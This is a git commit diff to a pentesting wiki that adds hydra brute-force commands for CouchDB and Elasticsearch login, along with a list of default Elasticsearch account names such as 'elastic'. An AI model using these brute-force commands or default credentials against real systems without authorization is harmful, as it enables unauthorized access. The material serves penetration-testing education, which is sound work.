GitBook: [master] 2 pages modified

2025-02-16 14:08:26 +00:00 · 2020-07-17 23:59:16 +00:00 · 2020-07-17 23:59:16 +00:00 · e4689ab223
commit e4689ab223
parent 18c50dbb4f
2 changed files with 9 additions and 1 deletions
--- a/brute-force.md
+++ b/brute-force.md
@ -79,6 +79,13 @@ nmap --script cassandra-brute -p 9160 <IP>

 ```bash
 msf> use auxiliary/scanner/couchdb/couchdb_login
+hydra /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
+```
+
+### Elasticsearch
+
+```text
+hydra /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
 ```

 ### FTP
--- a/pentesting/9200-pentesting-elasticsearch.md
+++ b/pentesting/9200-pentesting-elasticsearch.md
@ -35,7 +35,8 @@ If you don't see that response accessing `/` see the following section.
 {"error":{"root_cause":[{"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}}],"type":"security_exception","reason":"missing authentication credentials for REST request [/]","header":{"WWW-Authenticate":"Basic realm=\"security\" charset=\"UTF-8\""}},"status":401}
 ```

-That will means that authentication is configured an you need valid credentials to obtain any info from elasticserach. Then, you can **try to bruteforce it** \(it uses HTTP basic auth, so anything that BF HTTP basic auth can be used\).
+That will means that authentication is configured an **you need valid credentials** to obtain any info from elasticserach. Then, you can [**try to bruteforce it**](../brute-force.md#elasticsearch) ****\(it uses HTTP basic auth, so anything that BF HTTP basic auth can be used\).  
+Here you have a **list default usernames**: _**elastic** \(superuser\), remote\_monitoring\_user, beats\_system, logstash\_system, kibana, kibana\_system, apm\_system_

 ### Elastic Info